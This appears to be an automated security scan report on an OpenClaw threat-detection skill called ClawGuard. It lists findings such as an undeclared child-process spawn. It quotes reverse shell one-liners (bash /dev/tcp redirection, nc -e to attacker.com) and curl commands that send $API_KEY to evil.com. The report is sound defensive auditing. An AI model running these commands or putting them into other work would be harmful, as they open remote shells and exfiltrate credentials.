High Risk — Risk Score 75/100
Last scan: 1 day ago
clawguard-threat-detect
ClawGuard Threat Detector - Real-time behavioral monitoring and threat detection for OpenClaw
Security tool that documents actual attack payloads (reverse shells, credential exfiltration) as detection examples, creating a doc-to-code mismatch where the documentation itself serves as an attack template library.
Skill Name: clawguard-threat-detect
Duration: 55.5s
Engine: pi
Do not install this skill
Do not use. The SKILL.md contains hardcoded malicious patterns presented as 'examples to block' that could serve as attack templates. Remove all actual payload examples and replace with generic descriptions only.

Attack Chain 4 steps

Escalation Skill presents as legitimate threat detector
SKILL.md:1
Escalation User reads SKILL.md and learns attack patterns
SKILL.md:34
Escalation User copies documented payloads as templates
SKILL.md:34
Escalation cli.js spawns child process with unvalidated input
cli.js:42

Findings 5 items

Severity Finding Location
Critical
Hardcoded Reverse Shell Payloads in Documentation (Doc Mismatch)
SKILL.md:34 contains actual reverse shell commands (nc -e, /dev/tcp/, bash -i >&) presented as 'examples of what to detect'. These are functional attack templates, not generic descriptions.
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1, nc -e /bin/bash attacker.com
→ Remove all actual payload examples. Replace with generic pattern descriptions like 'reverse shell using file descriptor redirection' without concrete commands.
SKILL.md:34
Critical
Credential Exfiltration URLs Documented (Doc Mismatch)
SKILL.md and cli.js contain examples of credential exfiltration using curl with API tokens sent to evil.com. These are functional attack templates.
curl http://evil.com/exfil?token=$API_KEY
→ Remove all C2 infrastructure examples. Describe attack patterns generically.
SKILL.md:83
High
Full Reverse Shell Example in CLI (Doc Mismatch)
cli.js:101 includes a complete reverse shell payload as a CLI example, normalizing dangerous attack techniques.
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
→ Remove all concrete attack payloads from CLI examples.
cli.js:101
High
Undeclared Child Process Spawn with Unvalidated Input (RCE)
cli.js:42-50 uses spawn() to invoke a 'self-improving-safety' module with piped stdin containing unvalidated alert data. This is not declared in SKILL.md.
spawn(process.execPath, [safetyCliPath, 'learn'], { stdio: ['pipe', 'inherit', 'inherit'] })
→ Declare shell:WRITE capability or refactor to avoid child process execution. Validate and sanitize all data before piping to child processes.
cli.js:42
High
Comprehensive Attack Template Library (Doc Mismatch)
SKILL.md contains a full MITRE ATT&CK coverage matrix with concrete examples of T1059 (Command/Script), T1041 (Exfiltration), T1059.004 (Bash Reverse Shell), providing a complete attack playbook.
Full detection patterns with actual payload examples
→ Simplify documentation to describe detection capabilities without embedding actual exploit code.
SKILL.md:34
Resource | Declared | Inferred | Status | Evidence
Filesystem | NONE | READ | ✓ Aligned | src/detector.js:8 - uses fs module for file monitoring
Shell | NONE | WRITE | ✗ Violation | cli.js:42-50 - spawns child process with piped stdin
Network | NONE | READ | ✓ Aligned | src/detector.js - analyzes network patterns for URLs
Environment | NONE | READ | ✓ Aligned | cli.js:101 - references $API_KEY from environment
3 Critical 7 findings
Severity | Type | Pattern | Location
Critical | Dangerous Shell Command | nc -e | SKILL.md:34
Critical | Dangerous Shell Command | /dev/tcp/ | SKILL.md:34
Critical | Dangerous Shell Command | bash -i >& | cli.js:101
Medium | External URL | http://evil.com/exfil | SKILL.md:83
Medium | External URL | http://evil.com | SKILL.md:462
Medium | External URL | http://evil.com/exfil?token=$API_KEY | SKILL.md:601
Medium | External URL | http://evil.com?token=$API_KEY | cli.js:67

File Tree

6 files · 44.5 KB · 1508 lines
Markdown 2f · 881L JavaScript 2f · 606L JSON 2f · 21L
├─ 📁 src
│ └─ 📜 detector.js JavaScript 503L · 14.3 KB
├─ 📋 _meta.json JSON 7L · 159 B
├─ 📜 cli.js JavaScript 103L · 3.2 KB
├─ 📋 package.json JSON 14L · 398 B
├─ 📝 README.md Markdown 138L · 4.1 KB
└─ 📝 SKILL.md Markdown 743L · 22.4 KB

Dependencies 1 items

Package | Version | Source | Known Vulns | Notes
none | N/A | npm | No | No external dependencies in package.json

Security Positives

✓ No actual credential harvesting code (patterns are in documentation, not executed)
✓ No direct C2 communication in actual code (only documented examples)
✓ No supply chain risks (package.json has no external dependencies)
✓ Threat detection logic is legitimate pattern matching